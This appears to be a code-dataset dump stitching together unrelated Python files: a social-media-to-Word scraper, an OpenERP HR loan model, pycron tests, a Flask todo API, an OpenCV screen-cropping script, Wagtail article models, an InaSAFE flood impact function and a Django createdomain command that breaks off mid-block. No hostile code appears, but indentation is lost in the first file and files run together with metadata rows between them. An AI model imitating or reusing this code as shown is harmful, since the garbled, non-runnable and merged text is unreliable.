for filename in filenames:
try:
run_pic = para.add_run()
run_pic.add_picture(filename, width=Inches(3))
para.add_run('\n')
except:
            print('Error inserting quoted-post image: ' + filename)
run_time = para.add_run(quotation_items[2])
font_time = run_time.font
font_time.bold = False
font_time.size = Pt(8)
font_time.color.rgb = RGBColor(0x69, 0x69, 0x69)
def add_picture(document, story):
filenames = analyze_pic(story)
for filename in filenames:
try:
document.add_picture(filename, width=Inches(5))
except:
            print('Error inserting image: ' + filename)
def add_time(document, time):
para = document.add_paragraph()
run = para.add_run(time)
font = run.font
font.italic = True
#font.name = 'Microsoft YaHei'
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
def add_location(document, story):
location_items = analyze_loc(story)
if len(location_items) <= 0:
return
link_name = location_items[2]
google_map_url = 'https://maps.google.com/maps?q=' + location_items[0] + ',' + location_items[1]
print(google_map_url)
para = document.add_paragraph()
run = para.add_run(u'位置:')
font = run.font
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
docx_ext.add_hyperlink(para, google_map_url, link_name, '4169E1', False)
def add_video(document, story):
video_items = analyze_video(story)
if not video_items:
return
para = document.add_paragraph()
run = para.add_run()
font = run.font
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
docx_ext.add_hyperlink(para, video_items[0], video_items[1], '4169E1', False)
try:
document.add_picture(video_items[3], width=Inches(3))
except:
        print('Error inserting video cover: ' + video_items[3])
def download_pic(url, extension):
    filename = None
    try:
        if not os.path.exists('.//pics'):
            os.mkdir('.//pics')
        filename = '.\\pics\\' + str(uuid.uuid4()) + extension
        request.urlretrieve(url, filename)
    except Exception:
        print('Error downloading image: ' + url)
    return filename
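# e.g. download_pic('http://example.com/a.jpg', JPEG_EXTENSION) returns a
# path like '.\\pics\\<uuid>.jpg', or None when the download failed
# (the URL above is only an illustrative assumption)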
def analyze_pic(story):
filenames = []
if story.__contains__('class="picBox"'):
pattern = re.compile(r'<div class="picBox">\n<a href="(.*?)" data-like', re.S)
img_url = re.findall(pattern, story)[0]
        print('Image:', img_url)
filename = download_pic(img_url, JPEG_EXTENSION)
filenames.append(filename)
elif story.__contains__('class="tl_imgGroup'):
pattern = re.compile(r'<div class="tl_imgGroup(.*?)<div class="miniMultiMedia clear"', re.S)
imgs_str = re.findall(pattern, story)[0]
pattern_img = re.compile(r'<a href="(.*?)" class="tl_imgGroup', re.S)
imgs = re.findall(pattern_img, imgs_str)
for img_url in imgs:
            print('Image:', img_url)
filename = download_pic(img_url, JPEG_EXTENSION)
filenames.append(filename)
return filenames
def analyze_loc(story):
location_items = []
if story.__contains__('class="areaInfo"'):
pattern = re.compile(r'boss="btn_check_tweetNear".*?lat=(.*?)&lng=(.*?)&addr=(.*?)" target', re.S)
location_items = re.findall(pattern, story)[0]
        print(u'Location: ' + location_items[2])
        print(u'Latitude: ' + location_items[0])
        print(u'Longitude: ' + location_items[1])
return location_items
def analyze_video(story):
video_items = []
if story.__contains__('class="videoBox"'):
pattern = re.compile(r'<div class="videoBox".*?realurl="(.*?)".*?reltitle="(.*?)".*?<img.*?crs="(.*?)"', re.S)
video_items = re.findall(pattern, story)[0]
        print(u'Video title: ' + video_items[1])
        print(u'Video URL: ' + video_items[0])
        print(u'Video cover: ' + video_items[2])
try:
filename = download_pic(video_items[2], '.jpg')
except:
            print(u'Error downloading video cover: ' + video_items[2])
filename = None
video_items = list(video_items)
video_items.append(filename)
return video_items
def depart_quotation(story):
quotation_block = None
if story.__contains__('class="replyBox"'):
if story.__contains__('class="noMSource"'):#原文已被作者删除的情况
pattern = re.compile(r'(<div class="replyBox".*?<div class="noMSource".*?</div>.*?</div>)', re.S)
quotation_block = re.findall(pattern, story)[0]
else:
pattern = re.compile(r'(<div class="replyBox".*?<div class="msgBox".*?title=".*?" gender=' +
'.*?<div class="pubInfo.*?from="\\d*">.*?</a>.*?</div>.*?</div>)', re.S)
quotation_block = re.findall(pattern, story)[0]
story = story.replace(quotation_block, '')
return story, quotation_block
def analyze_quotation(quotation):
quotation_items = []
if quotation.__contains__('class="noMSource"'):
quotation_items = [u'原文已经被作者删除。']
return quotation_items
pattern = re.compile(r'<div class="msgCnt".*?title="(.*?)" gender=' +
'.*?<div>(.*?)</div>' +
'.*?<div class="pubInfo.*?from="\\d*">(.*?)</a>', re.S)
quotation_items = re.findall(pattern, quotation)[0]
    print('Original author:', quotation_items[0])
    print('Original content:', quotation_items[1])
    print('Original time:', quotation_items[2])
return quotation_items
| apache-2.0 | -2,133,465,114,962,808,600 | 38.012739 | 118 | 0.580292 | false |
morrillo/hr_loans | hr.py | 1 | 1465 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class hr_loan(osv.osv):
_name = 'hr.loan'
_description = 'HR Loan'
_columns = {
'employee_id': fields.many2one('hr.employee','id','Employee ID'),
'loan_type': fields.selection((('P','Payment Advance'),
('L','Loan')),'Loan Type'),
'loan_date': fields.date('Loan Date'),
'comment': fields.text('Additional Information'),
}
hr_loan()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -1,966,382,299,273,435,600 | 37.552632 | 78 | 0.604778 | false |
kipe/pycron | tests/test_minute.py | 1 | 3235 | from datetime import datetime
import pycron
from pytz import utc
import pendulum
import arrow
import udatetime
from delorean import Delorean
def test_minute():
def run(now):
assert pycron.is_now('* * * * *', now)
assert pycron.is_now('9 * * * *', now)
assert pycron.is_now('*/1 * * * *', now)
assert pycron.is_now('*/3 * * * *', now)
assert pycron.is_now('*/9 * * * *', now)
assert pycron.is_now('3,9,25,16 * * * *', now)
assert pycron.is_now('*/2 * * * *', now) is False
assert pycron.is_now('*/4 * * * *', now) is False
assert pycron.is_now('*/5 * * * *', now) is False
assert pycron.is_now('*/12 * * * *', now) is False
assert pycron.is_now('3,25,16 * * * *', now) is False
assert pycron.is_now('0-10 * * * *', now)
assert pycron.is_now('0-10 0-10 * * *', now)
assert pycron.is_now('10-20 * * * *', now) is False
assert pycron.is_now('10-20 10-20 * * *', now) is False
assert pycron.is_now('1,2,5-10 * * * *', now)
assert pycron.is_now('9,5-8 * * * *', now)
assert pycron.is_now('10,20-30 * * * *', now) is False
# Issue 14
assert pycron.is_now('1-59/2 * * * *', now) is True
assert pycron.is_now('1-59/4 * * * *', now) is True
assert pycron.is_now('1-59/8 * * * *', now) is True
now = datetime(2015, 6, 18, 0, 9)
run(now)
run(now.replace(tzinfo=utc))
run(pendulum.instance(now))
run(arrow.get(now))
run(udatetime.from_string(now.isoformat()))
run(Delorean(datetime=now, timezone='UTC').datetime)
def test_last_minute():
def run(now):
assert pycron.is_now('* * * * *', now)
assert pycron.is_now('59 * * * *', now)
assert pycron.is_now('*/1 * * * *', now)
# Issue 14
assert pycron.is_now('1-59/2 * * * *', now) is True
now = datetime(2015, 6, 18, 0, 59)
run(now)
run(now.replace(tzinfo=utc))
run(pendulum.instance(now))
run(arrow.get(now))
run(udatetime.from_string(now.isoformat()))
run(Delorean(datetime=now, timezone='UTC').datetime)
def test_minute_ranges():
for i in range(1, 59, 2):
now = datetime(2015, 6, 18, 0, i)
assert pycron.is_now('1-59/2 * * * *', now)
assert pycron.is_now('1-59/2 * * * *', now.replace(tzinfo=utc))
assert pycron.is_now('1-59/2 * * * *', pendulum.instance(now))
assert pycron.is_now('1-59/2 * * * *', arrow.get(now))
assert pycron.is_now('1-59/2 * * * *', udatetime.from_string(now.isoformat()))
assert pycron.is_now('1-59/2 * * * *', Delorean(datetime=now, timezone='UTC').datetime)
for i in range(0, 59, 2):
now = datetime(2015, 6, 18, 0, i)
assert pycron.is_now('1-59/2 * * * *', now) is False
assert pycron.is_now('1-59/2 * * * *', now.replace(tzinfo=utc)) is False
assert pycron.is_now('1-59/2 * * * *', pendulum.instance(now)) is False
assert pycron.is_now('1-59/2 * * * *', arrow.get(now)) is False
assert pycron.is_now('1-59/2 * * * *', udatetime.from_string(now.isoformat())) is False
assert pycron.is_now('1-59/2 * * * *', Delorean(datetime=now, timezone='UTC').datetime) is False
| mit | 4,184,455,455,338,272,000 | 39.949367 | 104 | 0.550541 | false |
chrisng93/todo-app | server/app/api/lists.py | 1 | 1669 | from flask import Blueprint, request, jsonify
from sqlalchemy.exc import IntegrityError
from ..models.List import List
from ..extensions import db
list_api = Blueprint('list', __name__, url_prefix='/api/list')
@list_api.route('/', methods=['GET'])
def get_lists():
lists = List.query
return jsonify({'lists': [todo_list.to_json() for todo_list in lists]})
@list_api.route('/<int:id>', methods=['GET'])
def get_list(id):
todo_list = List.query.get_or_404(id)
return jsonify({'list': todo_list.to_json()})
@list_api.route('/', methods=['POST'])
def create_list():
try:
todo_list = List().from_json(request.json)
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()}), 201
except IntegrityError as e:
return jsonify({'message': str(e)}), 400
@list_api.route('/<int:id>', methods=['PUT'])
def update_list(id):
try:
todo_list = List.query.get_or_404(id)
todo_list.from_json(request.json)
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()})
except IntegrityError as e:
return jsonify({'message': str(e)}), 400
@list_api.route('/<int:id>', methods=['DELETE'])
def delete_list(id):
todo_list = List.query.get_or_404(id)
db.session.delete(todo_list)
db.session.commit()
return jsonify({})
@list_api.route('/<int:id>/complete', methods=['PUT'])
def mark_all_complete(id):
todo_list = List.query.get_or_404(id)
todo_list.mark_all_complete()
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()})
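# Hypothetical client call (routes from this blueprint; the JSON payload
# fields are assumptions, since List.from_json() is defined elsewhere):
#   curl -X POST http://localhost:5000/api/list/ \
#        -H 'Content-Type: application/json' -d '{"name": "Groceries"}'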
| mit | 5,324,590,652,803,928,000 | 27.288136 | 75 | 0.630917 | false |
meizhoubao/pyimagesearch | Pokedex/find_screen.py | 1 | 2248 | from pyimagesearch import imutils
from skimage import exposure
import numpy as np
import argparse
import cv2
ap = argparse.ArgumentParser()
ap.add_argument("-q", "--query", required=True,
help = "Path to the query image")
args = vars(ap.parse_args())
image = cv2.imread(args["query"])
ratio = image.shape[0] / 300.0
orig = image.copy()
image = imutils.resize(image, height = 300)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.bilateralFilter(gray, 11, 17, 17)
edged = cv2.Canny(gray, 30, 200)
(cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:10]
screenCnt = None
for c in cnts:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.02 * peri, True)
if len(approx) == 4:
screenCnt = approx
break
# cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 3)
# cv2.imshow("Game Boy Screen", image)
# cv2.waitKey(0)
pts = screenCnt.reshape(4, 2)
rect = np.zeros((4,2), dtype = "float32")
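# order the corners: the top-left point has the smallest x+y sum and the
# bottom-right the largest; the smallest y-x difference picks the top-right
# corner and the largest picks the bottom-left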
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
rect *= ratio
(tl, tr, br, bl) = rect
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
maxHeight = max(int(heightA), int(heightB))
dst = np.array([
[0,0],
[maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]
], dtype = "float32")
M = cv2.getPerspectiveTransform(rect, dst)
wrap = cv2.warpPerspective(orig, M, (maxWidth, maxHeight))
wrap = cv2.cvtColor(wrap, cv2.COLOR_BGR2GRAY)
wrap = exposure.rescale_intensity(wrap, out_range = (0, 255))
(h, w) = wrap.shape
(dX, dY) = (int(w * 0.4), int(h * 0.4))
crop = wrap[10:dY, w - dX:w - 10]
cv2.imwrite("cropped.png", crop)
cv2.imshow("image", image)
cv2.imshow("edge", edged)
cv2.imshow("wrap", imutils.resize(wrap, height = 300))
cv2.imshow("crop", imutils.resize(crop, height = 300))
cv2.waitKey(0)
| gpl-3.0 | -7,678,565,435,378,642,000 | 27.455696 | 82 | 0.626335 | false |
jeremy-c/unusualbusiness | unusualbusiness/articles/models.py | 1 | 13076 | from __future__ import unicode_literals
from django.db import models
from django.db.models import Model
from django.utils import timezone
from django.utils.translation import ugettext as _
from modelcluster.fields import ParentalKey
from taggit.models import TaggedItemBase, CommonGenericTaggedItemBase, GenericUUIDTaggedItemBase, Tag
from wagtail.wagtailadmin.edit_handlers import FieldPanel, InlinePanel, PageChooserPanel, StreamFieldPanel
from wagtail.wagtailcore import blocks
from wagtail.wagtailcore.fields import StreamField
from wagtail.wagtailcore.models import Page, Orderable
from wagtail.wagtailembeds.blocks import EmbedBlock
from wagtail.wagtailimages.blocks import ImageChooserBlock
from wagtail.wagtailimages.edit_handlers import ImageChooserPanel
from wagtail.wagtailsearch import index
from unusualbusiness.events.models import EventPage
from unusualbusiness.organizations.models import OrganizationPage
from unusualbusiness.utils.models import PageFormat, RenderInlineMixin, RelatedHowToMixin, FeaturedImageBlock, \
FeaturedVideoBlock, FeaturedAudioBlock, PullQuoteBlock
class TheoryArticleIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.TheoryArticlePage']
def get_context(self, request):
context = super(TheoryArticleIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['theory_articles'] = TheoryArticlePage.objects.all().live().order_by('-publication_date')
context['parent'] = self.get_parent().specific
return context
class StoryArticleIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.StoryArticlePage']
def get_context(self, request):
context = super(StoryArticleIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['story_articles'] = StoryArticlePage.objects.all().live().order_by('-publication_date')
return context
class ActivityIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['events.EventPage', 'articles.NewsArticlePage', ]
@staticmethod
def featured_articles():
event_list = EventPage.objects.live().filter(is_featured=True)
return sorted(event_list,
key=lambda instance: instance.first_published_at,
reverse=True)
def get_context(self, request):
context = super(ActivityIndexPage, self).get_context(request)
context['events'] = EventPage.objects.live().order_by('start_date')
context['initial_slide'] = EventPage.objects.live().count() - 1
context['news_articles'] = NewsArticlePage.objects.child_of(self).live().order_by('-publication_date')
return context
class AbstractArticle(models.Model, RenderInlineMixin):
is_featured = models.BooleanField(
verbose_name = _("Is Featured on home page"),
default=False
)
subtitle = models.CharField(
verbose_name=_('subtitle'),
max_length=255,
help_text=_("The subtitle of the page"),
blank=True
)
featured = StreamField([
('featured_image', FeaturedImageBlock()),
('featured_video', FeaturedVideoBlock()),
('featured_audio', FeaturedAudioBlock()),
])
author = models.ForeignKey(
'articles.AuthorPage',
verbose_name=_('author'),
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
publication_date = models.DateField(
verbose_name=_('publication_date'),
help_text=_("The publication date of the article"),
default=timezone.now,
blank=True,
null=True,
)
body = StreamField([
('introduction', blocks.TextBlock(icon="italic", rows=3)),
('paragraph', blocks.RichTextBlock(icon="pilcrow")),
# ('markdown_paragraph', MarkdownBlock(icon="code")),
('image', ImageChooserBlock(icon="image")),
('pullquote', PullQuoteBlock()),
])
class Meta:
abstract = True
verbose_name = _("Article")
def __featured_item(self, block_type='featured_image'):
for stream_child in self.featured:
if stream_child.block_type == block_type:
return stream_child
return None
@property
def featured_image(self):
return self.__featured_item('featured_image')
@property
def featured_audio(self):
return self.__featured_item('featured_audio')
@property
def featured_video(self):
return self.__featured_item('featured_video')
@property
def introduction(self):
for stream_child in self.body:
if stream_child.block_type == 'introduction':
return stream_child.value
return None
class StoryArticlePage(Page, AbstractArticle, RelatedHowToMixin):
parent_page_types = ['articles.StoryArticleIndexPage']
subpage_types = []
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='text',
choices=(PageFormat.TEXT,
PageFormat.AUDIO,
PageFormat.VIDEO,
PageFormat.IMAGES, ))
class Meta:
verbose_name = _("Story")
verbose_name_plural = _("Stories")
def related_organizations(self):
return [related_organization.organization_page
for related_organization
in self.organizations.select_related().all()]
def get_context(self, request):
context = super(StoryArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_story_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
StoryArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
FieldPanel('publication_date'),
StreamFieldPanel('featured'),
StreamFieldPanel('body'),
InlinePanel('organizations', label=_("Organizations")),
]
StoryArticlePage.promote_panels = Page.promote_panels
StoryArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('organizations', [
index.SearchField('title'),
]),
index.RelatedFields('how_to_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class StoryArticlePageOrganization(Orderable, models.Model):
story_article_page = ParentalKey('articles.StoryArticlePage', related_name='organizations')
organization_page = models.ForeignKey(
'organizations.OrganizationPage',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='story_article_page'
)
panels = [
PageChooserPanel('organization_page'),
]
def __str__(self): # __unicode__ on Python 2
return self.story_article_page.title + " -> " + self.organization_page.title
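# StoryArticlePageOrganization is the explicit through table linking a story
# to its organizations, which lets the InlinePanel above keep them ordered.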
class TheoryArticlePage(Page, AbstractArticle, RelatedHowToMixin):
ajax_template = 'articles/blocks/inline_theory_article.html'
parent_page_types = ['articles.TheoryArticleIndexPage']
subpage_types = []
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='theory',
choices=(PageFormat.THEORY,
PageFormat.AUDIO,
PageFormat.VIDEO,
PageFormat.LINK,
PageFormat.DOCUMENT, ))
class Meta:
verbose_name = _("Theory")
verbose_name_plural = _("Theories")
def get_context(self, request):
context = super(TheoryArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_theory_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
TheoryArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
StreamFieldPanel('featured'),
FieldPanel('publication_date'),
StreamFieldPanel('body'),
]
TheoryArticlePage.promote_panels = Page.promote_panels
TheoryArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('how_to_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class NewsArticlePage(Page, AbstractArticle, RelatedHowToMixin):
event_page = models.ForeignKey(
'events.EventPage',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='news_article_page'
)
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='event',
choices=(PageFormat.EVENT,
PageFormat.IMAGES,
PageFormat.AUDIO,
PageFormat.VIDEO, ))
parent_page_types = ['events.EventPage', 'articles.ActivityIndexPage']
subpage_types = []
class Meta:
verbose_name = _("News or report article")
verbose_name_plural = _("News or report articles")
def get_context(self, request):
context = super(NewsArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_news_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
NewsArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
PageChooserPanel('event_page', page_type='events.EventPage'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
StreamFieldPanel('featured'),
FieldPanel('publication_date'),
StreamFieldPanel('body'),
]
NewsArticlePage.promote_panels = Page.promote_panels
NewsArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('event_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class AuthorPage(Page):
photo = models.ForeignKey(
'wagtailimages.Image',
verbose_name=_('photo'),
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
biography = models.TextField(
verbose_name=_('biography'),
help_text=_("The biography of the author (max. 150 woorden)"),
blank=True
)
parent_page_types = ['articles.AuthorIndexPage']
subpage_types = []
class Meta:
verbose_name = _("Author")
verbose_name_plural = _("Authors")
AuthorPage.content_panels = Page.content_panels + [
FieldPanel('biography'),
ImageChooserPanel('photo'),
]
AuthorPage.promote_panels = Page.promote_panels
class AuthorIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.AuthorPage']
def get_context(self, request):
context = super(AuthorIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['authors'] = AuthorPage.objects.all().live()
context['parent'] = self.get_parent().specific
return context
| bsd-3-clause | 738,842,656,338,968,400 | 32.875648 | 112 | 0.643698 | false |
Samweli/inasafe | safe/impact_functions/inundation/flood_raster_population/impact_function.py | 1 | 8986 | # coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Flood Raster Impact Function
on Population.
Contact : [email protected]
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Rizky Maulana Nugraha'
import logging
import numpy
from safe.impact_functions.core import (
population_rounding,
has_no_data)
from safe.impact_functions.impact_function_manager \
import ImpactFunctionManager
from safe.impact_functions.inundation.flood_raster_population\
.metadata_definitions import FloodEvacuationRasterHazardMetadata
from safe.impact_functions.bases.continuous_rh_continuous_re import \
ContinuousRHContinuousRE
from safe.utilities.i18n import tr
from safe.impact_functions.core import no_population_impact_message
from safe.common.exceptions import ZeroImpactException
from safe.storage.raster import Raster
from safe.common.utilities import (
format_int,
create_classes,
humanize_class,
create_label,
verify)
from safe.gui.tools.minimum_needs.needs_profile import add_needs_parameters, \
get_needs_provenance_value
from safe.impact_reports.population_exposure_report_mixin import \
PopulationExposureReportMixin
from safe.definitions import no_data_warning
import safe.messaging as m
LOGGER = logging.getLogger('InaSAFE')
class FloodEvacuationRasterHazardFunction(
ContinuousRHContinuousRE,
PopulationExposureReportMixin):
# noinspection PyUnresolvedReferences
"""Risk plugin for flood population evacuation."""
_metadata = FloodEvacuationRasterHazardMetadata()
def __init__(self):
"""Constructor."""
super(FloodEvacuationRasterHazardFunction, self).__init__()
PopulationExposureReportMixin.__init__(self)
self.impact_function_manager = ImpactFunctionManager()
# AG: Use the proper minimum needs, update the parameters
self.parameters = add_needs_parameters(self.parameters)
# Initialize instance attributes for readability (pylint)
self.no_data_warning = False
def notes(self):
"""Return the notes section of the report.
:return: The notes that should be attached to this impact report.
:rtype: list
"""
population = format_int(population_rounding(self.total_population))
thresholds = self.parameters['thresholds'].value
if get_needs_provenance_value(self.parameters) is None:
needs_provenance = ''
else:
needs_provenance = tr(get_needs_provenance_value(self.parameters))
fields = [
tr('Total population in the analysis area: %s') % population,
tr('<sup>1</sup>People need evacuation if flood levels exceed '
'%(eps).1f m.') % {'eps': thresholds[-1]},
needs_provenance,
]
if self.no_data_warning:
fields = fields + no_data_warning
# include any generic exposure specific notes from definitions.py
fields = fields + self.exposure_notes()
# include any generic hazard specific notes from definitions.py
fields = fields + self.hazard_notes()
return fields
def _tabulate_zero_impact(self):
thresholds = self.parameters['thresholds'].value
message = m.Message()
table = m.Table(
style_class='table table-condensed table-striped')
row = m.Row()
label = m.ImportantText(
tr('People in %.1f m of water') % thresholds[-1])
content = '%s' % format_int(self.total_evacuated)
row.add(m.Cell(label))
row.add(m.Cell(content))
table.add(row)
table.caption = self.question
message.add(table)
message = message.to_html(suppress_newlines=True)
return message
def run(self):
"""Risk plugin for flood population evacuation.
Counts number of people exposed to flood levels exceeding
specified threshold.
:returns: Map of population exposed to flood levels exceeding the
threshold. Table with number of people evacuated and supplies
required.
:rtype: tuple
"""
# Determine depths above which people are regarded affected [m]
# Use thresholds from inundation layer if specified
thresholds = self.parameters['thresholds'].value
verify(
isinstance(thresholds, list),
'Expected thresholds to be a list. Got %s' % str(thresholds))
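        # e.g. thresholds [0.7, 1.0] produce the categories
        # 'People in 0.7 m to 1.0 m of water' and 'People in >= 1.0 m of water'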
# Extract data as numeric arrays
data = self.hazard.layer.get_data(nan=True) # Depth
if has_no_data(data):
self.no_data_warning = True
# Calculate impact as population exposed to depths > max threshold
population = self.exposure.layer.get_data(nan=True, scaling=True)
total = int(numpy.nansum(population))
if has_no_data(population):
self.no_data_warning = True
# merely initialize
impact = None
for i, lo in enumerate(thresholds):
if i == len(thresholds) - 1:
# The last threshold
thresholds_name = tr(
'People in >= %.1f m of water') % lo
self.impact_category_ordering.append(thresholds_name)
self._evacuation_category = thresholds_name
impact = medium = numpy.where(data >= lo, population, 0)
else:
# Intermediate thresholds
hi = thresholds[i + 1]
thresholds_name = tr(
'People in %.1f m to %.1f m of water' % (lo, hi))
self.impact_category_ordering.append(thresholds_name)
medium = numpy.where((data >= lo) * (data < hi), population, 0)
# Count
val = int(numpy.nansum(medium))
self.affected_population[thresholds_name] = val
# Put the deepest area in top #2385
self.impact_category_ordering.reverse()
self.total_population = total
self.unaffected_population = total - self.total_affected_population
# Carry the no data values forward to the impact layer.
impact = numpy.where(numpy.isnan(population), numpy.nan, impact)
impact = numpy.where(numpy.isnan(data), numpy.nan, impact)
# Count totals
evacuated = self.total_evacuated
self.minimum_needs = [
parameter.serialize() for parameter in
self.parameters['minimum needs']
]
total_needs = self.total_needs
# check for zero impact
if numpy.nanmax(impact) == 0 == numpy.nanmin(impact):
message = no_population_impact_message(self.question)
raise ZeroImpactException(message)
# Create style
colours = [
'#FFFFFF', '#38A800', '#79C900', '#CEED00',
'#FFCC00', '#FF6600', '#FF0000', '#7A0000']
classes = create_classes(impact.flat[:], len(colours))
interval_classes = humanize_class(classes)
style_classes = []
for i in xrange(len(colours)):
style_class = dict()
if i == 1:
label = create_label(interval_classes[i], 'Low')
elif i == 4:
label = create_label(interval_classes[i], 'Medium')
elif i == 7:
label = create_label(interval_classes[i], 'High')
else:
label = create_label(interval_classes[i])
style_class['label'] = label
style_class['quantity'] = classes[i]
style_class['transparency'] = 0
style_class['colour'] = colours[i]
style_classes.append(style_class)
style_info = dict(
target_field=None,
style_classes=style_classes,
style_type='rasterStyle')
impact_data = self.generate_data()
extra_keywords = {
'map_title': self.map_title(),
'legend_notes': self.metadata().key('legend_notes'),
'legend_units': self.metadata().key('legend_units'),
'legend_title': self.metadata().key('legend_title'),
'evacuated': evacuated,
'total_needs': total_needs
}
impact_layer_keywords = self.generate_impact_keywords(extra_keywords)
# Create raster object and return
impact_layer = Raster(
impact,
projection=self.hazard.layer.get_projection(),
geotransform=self.hazard.layer.get_geotransform(),
name=self.metadata().key('layer_name'),
keywords=impact_layer_keywords,
style_info=style_info)
impact_layer.impact_data = impact_data
self._impact = impact_layer
return impact_layer
| gpl-3.0 | -2,536,155,877,016,420,000 | 35.677551 | 79 | 0.620632 | false |
Inboxen/Inboxen | inboxen/management/commands/createdomain.py | 1 | 1395 | ##
# Copyright (C) 2018 Jessica Tallon & Matt Molyneaux
#
# This file is part of Inboxen.
#
# Inboxen is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Inboxen is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Inboxen. If not, see <http://www.gnu.org/licenses/>.
##
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
from inboxen.models import Domain
class Command(BaseCommand):
help = "Create a domain"
def add_arguments(self, parser):
parser.add_argument("domain", help="domain to be created")
def handle(self, **options):
domain = options["domain"]
try:
Domain.objects.create(domain=domain)
except IntegrityError:
